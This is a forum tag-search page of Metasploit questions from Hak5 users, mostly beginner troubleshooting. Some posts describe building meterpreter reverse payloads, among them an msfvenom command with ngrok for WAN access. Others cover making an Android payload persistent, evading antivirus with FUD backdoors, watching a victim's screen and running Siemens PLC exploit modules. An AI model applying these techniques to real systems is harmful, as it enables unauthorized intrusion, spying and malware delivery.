Jump to content

Search the Community

Showing results for tags 'metasploit'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

  1. On the lan turtle I can catch multiple python/meterpreter/reverse_https sessions that are just dead on arrival. Am I doing something wrong?
  2. I'm a major newbie so this is probably a stupid question but I've gone to like the third page of Google and can't find anything about why this is happening. I'm basically just testing out the basics of Metasploit on my home router to mess around and I want to delete a host that I added with the "hosts -a" command. I type "hosts -d 192.168.1.1" and it's still in my hosts list. I'll link a screen shot of whats happening as well. https://imgur.com/a/xpcZHaG
  3. NOTE : THIS IS COMPLETELY FOR EDUCATIONAL PURPOSES AND I AM NOT TRYING TO HACK ANY DEVICE RIGHT NOW TO CREATE PROBLEM FOR SOMEONE .THE PHONE I AM TRYING TO EXPLOIT IS MY OWN SECOND DEVICE. I'm working with metasploit on TERMUX. So, My meterpreter session is open . I am able to access the SDCARD of the phone I am trying to exploit, but everytime I need to exploit the device, one needs to tap the app icon everytime for my meterpreter session to start. I want to create my payload persistent . So that, I don't have to wait for the user of the device to tap the icon again . So , I successfully created a bash file through "nano" which is named "syslogs.sh" and is placed in my sdcard. It works completely fine ; It contacts the device for my meterpreter session to start after a delay of every 20 seconds. So, I want to upload my syslogs.sh file from my SDCARD to sdcard of the device which I'm trying to exploit ; but it's just not happening!. I am getting an error like this >>>>> [-] 4 : Operation failed: 1 You can refer this image here . you can see here that I've also tried adding backslashes but it didn't seem to work. The location of my file is absolutely fine . If someone wants to exactly know what I'm trying to implement they can check this . I've honestly tried searching for solutions , I've seen previous solutions and posted my question on subreddits, stackoverflow, github but I'm not getting anything . I am really positive that you can guys can help me. I would highly appreciate ANY KIND OF SUGGESTION . I am absolutely new to this forum so if I've posted something wrong or I'm at a wrong place you can always let me know and I'll delete this post. Hoping for your replies.
  4. I'm pretty new to Metasploit but I have what appears to be a successful shell/session created however there is no prompt (normal commands return nothing) and I see that it shows only the default route (0.0.0.0:0) between my computer and the target. I did input my LHOST though it is a staged bind shell payload (inline payload shells produce the same result and meterpreter payloads don't work). Is it possible to obtain a full interactive shell? ======================================================================================================================================= msf5 exploit(windows/dcerpc/ms03_026_dcom) > run [*] 10.XX.XX.XX:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal... [*] 10.XX.XX.XX:135 - Binding to ZZ@ff_ip_tcp:10.XX.XX.XX[135] ... [*] 10.XX.XX.XX:135 - Bound to ZZ@ff_ip_tcp:10.XX.XX.XX[135] ... [*] 10.XX.XX.XX:135 - Sending exploit ... [*] Started bind TCP handler against 10.XX.XX.XX:135 [*] Encoded stage with x86/shikata_ga_nai [*] Sending encoded stage (267 bytes) to 10.XX.XX.XX [*] Command shell session 1 opened (0.0.0.0:0 -> 10.XX.XX.XX:135) at 2020-07-21 14:50:17 -0600 background Background session 1? [y/N] y msf5 exploit(windows/dcerpc/ms03_026_dcom) > sessions -i Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 shell x86/windows 0.0.0.0:0 -> 10.XX.XX.XX:135 (10.XX.XX.XX) msf5 exploit(windows/dcerpc/ms03_026_dcom) >
  5. Host OS: Windows 10 Pineapple Nano v. 2.7.0 VirtualBox v. 6.1.6 Kali Linux v. 2020.2 **Forward: I've been doing all this on my own private router, WiFi signal, computer, etc. Nothing illegal. Just trying to learn a new skill.** So I've been able to successfully capture a 4-way handshake (Both .CAP and.PCAP) using either the Pineapple Nano or Kali Linux> Successfully cracked the password of the WiFi AP using www.GPUHASH.me> And I can log into the "client" AP. I just don't know where to go from here and feel pretty dumb. How do I actually exploit the target from here? Over the last week I've been trying to learn Metasploit in Kali, thinking that this was the next logical step in the attack process. (I've also tried Armitage, but it seems like it's outdated and doesn't support Windows 10?) I understand the workflow of Metasploit: 1. Recon the target with various nmap scans: nmap -v -T4 -PA -sV --version-all --osscan-guess -A -sS -Pn 1-65535 <Target IP address> 2. Note the open port numbers/software & version numbers, etc. 3. (THIS IS WHERE I GET LOST) Search Exploit-Database.com for vulnerabilities on the open ports or services being run (See attached picture) 4. Load the Exploit> Set options> Run. I keep getting confused as to how to actually find known vulnerabilities given the data from the nmap scans. Has anyone else been in my position or am I just failing to understand something simple here? Thank you very much for any feedback guys!
  6. Hello guys, Before I start, I want to say that I looked on all the forums for a solution and tried multiple options until I started writing this. I have tried to make an exploit for Android. Everything works fine until I open the apk on my test phone where after I installed it by bypassing the security restrictions, it doesn't do anything. On msf it doesn't show that it's connected to a device. As well, regardless if I stop the exploit, kill it and remove it, the server is still up and contains the file. I need a solution since I believe that this is caused by the recent changes in metasploit and android 9.
  7. Hi Guys need help with this problem im having so im trying to hack my samsung s7 edge with a meterpreter apk and when i install and open it on my phone nothing happens it still says started reverse_TCP handler on my ip address :4444 any fixes? sincerely, Kyran
  8. How do I actually increase the dimensions of the pictures while doing webcam stream and snap? I'm currently using on my android, and while I can increase the quality to 100, my pictures come very small. It's possible to take as the size of the camera of the cellphone, or at least increase it a little bit?
  9. Im working with Kali Linux. I started getting into working with Metasploit, Payloads ... But heres the problem: I am not finding a way to create a Payload, that does not get detected by a Antivirus. Please Help 😄
  10. Hello people....... tried to get a connection vie Meterpreter to mi Pineapple nano, but all the fuck i h get is this msf5 exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.178.24 yes The listen address (an interface may be specified) LPORT 4747 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf5 exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.178.24:4747 [*] Sending stage (179779 bytes) to 192.168.178.25 Who knows more?
  11. I am trying to get more proficient with Metasploit. I have encountered an issue that has made me crazy the last few days. Using ms08_067_netapi in any manner I am getting: Handler failed to bind to xx.xxx.xx.x:4444:- - [*] Started reverse TCP handler on 0.0.0.0:4444 [-] xx.xxx.xx.x:445 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (xx.xxx.xx.x:445). [*] Exploit completed, but no session was created. I have found so much about this error but not the first full clear resolution. I have done so many things but so far I have been nulled. Any ideas or suggestions? Intel Xeon 8180 Octacosa-core Intel LGA 3647 Board Running 8 15TB Utrastar Drives Windows 10 Host/w Kali
  12. There are soo less commands for android in metasploit. It would be okay But i didnt find the command i needed the most. It was something like vnc_start . I dont remember but i used it in windows a long time ago and i got to see what the victim is doing etc. So how will i do it for android too.? Please help me out in this
  13. Hi, I wanted to learn how to perform ATP attacks. I have a problem with creating a backdoor / payload that will not be detected by antivirus systems and which will give me access to the attacked computer via a reverse connection. I'm not a good programmer, but I thought I would create my own code that would give me a system shell using the SSH reverse tunnel. I find that if it will be my code it will not be detectable for AV. Unfortunately, the more I think about it, I come to the conclusion that once I have such a system shell, I still have to provide a meterpreter payload, which will allow for more advanced work, and it will definitely detect the anti-virus. I want to learn but I do not know what to do in such a situation. How to create a meterpreter payload that will not be detected by AV? I see that msvenom generates already encoded payload. Is it possible to get such a payload not encrypted? Maybe if I changed his sources in pure C, it would be less detectable? I've tried veil, shellter, thefatrat, etc. But it does not help. Most AV immediately detect payload. I am mainly interested in payloads on MS Windows. Later I want to try Android.
  14. First thing first (1) Opening Terminal and typing following command:- "msfconsole" and getting this output:- so i ran that command in terminal did't worked out now after googling for 3 hrs i found many things which are here 1). i should run "bundle install" in this directory /usr/share/metasploit-framework after that i'm getting this error Now again after doing research i found that i've to update jason so ran following command "gem install json -v1.8.3" which gave me output as:- Please guys help me out here i can't open msfconsole.!😥
  15. Hi There, I am new to the Metasploit or something related to security likes hacks. I have some question. 1) First question, how to offline update Metasploit, can i just update for the latest update (Nov 2018) or must be one by one ? Example: Must be updated from Jan'18 - Feb'18 - Mar'18 .. until Nov'18 2) OS Usage, mostly Metasploit use or launched from Kali Linux. How if i run from Windows 7, is there any mallfunction or can be caused the other target PC error ? 3) While i try to exploiting, there are many lines likes: - No Payloads were compatible with exploit bla bla bla - Exploit failed: A payload has not been selected. Am i need to make the payloads first ? (how ?) For the last, if someone have simple tutorial how to use Metasploit, very glad if you can share with me. Waiting for some responses from the forums. Thank you in advance. Best Regards, Ruben.
  16. Hi Everyone. I am running a number of Metasploit modules for exploiting Siemens S7-300/400 and S7-1200 PLCs that were created from a Blackhat talk by Dillion Beresford in 2011. The modules are not supplied with Metasploit but have been added to the auxiliary/admin/scada/ directory. This is a link to the Modules https://github.com/moki-ics/s7-metasploit-modules The modules are showing up in Metasploit correctly and can be configured but when they are run there are a number of errors. Here is a link to a screen shot showing the errors: The module shown in the screen shot is simatic_s7_1200_command.rb I suspect the issue I am having is due to the version of Ruby being used with Metasploit is not compatible with the modules. I have run the modules in Metasploit running on Mac OSx, Metasploit on Kali running on a VM and Metasploit running on Kali on Raspberry Pi, all with same results. Greatly appreciate any help any1 can give me on this 1!
  17. Can i run a payload(meterpreter)(metasploit) on android with rubber ducky or bash bunny over (wan)
  18. So heres whats going on i made a shell, using reverse_tcp. And i put it on victims computer and opened it everything went smoothly in the process of opening the exe, anyways after i opened it, the shell didnt send a tcp connection back to me. Im doing this on a LAN network, both computers are right beside each other connected to ethernet. I made the exploit in a vm then uploaded it to mediafire and downloaded on other pc. But when i ran it, i didnt get a connection back it was like it was never ran. Heres all my console output currently even after opening i didnt take a screenshot but i did copy and paste. And put it on pastebin, so heres the link hopefully one of you can help me i would also like to say the the target pc had antivirus disabled. LINK: https://pastebin.com/R9G5nQGB I used port 4444 and my local ip. That link shows the whole process of setting up the payload and handler thats what all i did. Thanks to everyone who takes the time to read this i really need help.
  19. Hey guys, my problem is that I have just installed the Kali Linux VMware Image. I changed my pass and then I did an update (apt-get update && apt-get dist-upgrade). Now I get an error when I try to initialize the Metasploit databse with „msfdb init" : root@kali:~# msfdb reinit Database already started [+] Dropping databases 'msf' [+] Dropping databases 'msf_test' [+] Dropping database user 'msf' [+] Deleting configuration file /usr/share/metasploit-framework/config/database.yml [+] Stopping database [+] Starting database [+] Creating database user 'msf' Geben Sie das Passwort der neuen Rolle ein: Geben Sie es noch einmal ein: [+] Creating databases 'msf' [+] Creating databases 'msf_test' [+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml' [+] Creating initial database schema rake aborted! NoMethodError: undefined method `without' for #<Bundler::Settings:0x0000564cdb9a7b70> Did you mean? with_options /usr/share/metasploit-framework/Rakefile:18:in `rescue in <top (required)>' /usr/share/metasploit-framework/Rakefile:12:in `<top (required)>' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rake-12.3.0/exe/rake:27:in `<top (required)>' Caused by: LoadError: cannot load such file -- rspec/core /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/backports-3.11.1/lib/backports/std_lib.rb:9:in `require' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/backports-3.11.1/lib/backports/std_lib.rb:9:in `require_with_backports' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activesupport-4.2.10/lib/active_support/dependencies.rb:274:in `block in require' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activesupport-4.2.10/lib/active_support/dependencies.rb:240:in `load_dependency' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activesupport-4.2.10/lib/active_support/dependencies.rb:274:in `require' /usr/share/metasploit-framework/Rakefile:13:in `<top (required)>' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rake-12.3.0/exe/rake:27:in `<top (required)>' (See full trace by running task with --trace) Also when I start msfconsole there appears an error : root@kali:~# msfconsole /usr/share/metasploit-framework/lib/msf/core/opt.rb:55: warning: constant OpenSSL::SSL::SSLContext::METHODS is deprecated When I type db_status in msfconsole it says it is connected, but when i search for something it says that the cache is not build yet. Anyone got a solution for this ? :/ Thanks in advance
  20. v0dka

    Payload timeout

    Hi. I met a problem recently : I have installed metasploit and it runs well in SSH. But when I tried to run it in in a payload, just like: /root/metasploit-framework/msfconsole & It will run for a while, I can find it with cmd "ps -aux | grep 'msfconsole' ". But it then disappeared! As it takes a long time for msf to startup. so I think maybe the payload has a timeout. I'm not sure what's wrong with it. Thanks in advance
  21. Hey there! I am Luuk a 14 year old boy who's very intrested in cyber security. When I was little [smaller] ;] I always dream about being a cool hacker. Like 1 year ago I decided to start so i made a usb with kali linux on it and i learned the basics from metasploit [meterpreter payloads] I also discovered how to hide virus for a lot of av like windows defender. I also learned the basic commands of the terminal and working with armitage. But I have 1 problem ;[ Every time when i want to start a listener i make the payload like this msfvenom -p windows/meterpreter/reverse_tcp LHOST=tcp.ngrok.io LPORT=the port of ngrok -f exe > payload.exe So thats done and i wanted to start a listener. I open metasploit and type: use multi/handler set payload windows/meterpreter/reverse_tcp set lhost 127.0.0.1 set lport 80 exploit Ok so a few month's ago it would say started reverse handler ........ And it started to listen Now it says started reverse handler and a new line is opened. What!!! What's going on When i search the job with services its listening but when i type run {job nummer} it says did you wanted a reversebindlistenadress Failed to bind 127.0.0.1 failed to bind 0.0.0.0 So thats my problem oh. Extra note: I use ngrok for meterpreter over wan {i can't port forward for some reason} It would be great if i can get a answer thanks and happy hacking!
  22. Hello! I would like to ask if there is any way to use meterpreter directly from the bash bunny metasploit over wan after i infected a machine. And also if S. E. T is working :) Thanks in advance :)
  23. Digging my way through metasploit using armitage on my pentest lab. I have three VMs (of 15 installed) running 1.metasploitable 2.Windows XP32 SP2 3.CentOS Nmap scan via Armitage is finding metasploitable and CentoS but not the Windows XP machine (which is kinda funny actually). However when I run Zenmap separately, it finds that machine. All VMs are in the same network. Am I missing something for metasploit to see a Windows machine? Interestingly when I review the output from the scan, there is a line that says "All 65535 scanned ports on {IP ADDRESS} are filtered...maybe I should go back to using Windows XP...
  24. blackcoat

    Meterpreter

    Fud backdoor with Pwnwinds with bat. format + Powershell is not connecting with metasploit listener.The backdoor was made by TheFatRat connection type :reverse https Attacked virtual box os type:windows 10
  25. Hello everyone, I am new here - this is very first post. I hope it's in the correct section! Anyway, the past week I have been wanting to port forward in order to be able to start an external session (get into meterpreter when the victim is not using my IP) However, it turns out that port forwarding isn't possible on IPV6 - in fact, it WOULD work if the victim uses IPV6 as well. I haven't confirmed that, anyway. ( please correct me if I am wrong here) My question is, is there any way to start a session as an IPV6 user, as in maybe an exploit that can do it? I usually use the multi/handler exploit, with the windows/meterpreter/reverse_tcp payload. (also tried reverse_ipv6_tcp) If someone can help me or respond to this thread I will highly appreciate it! Thank you!
×
×
  • Create New...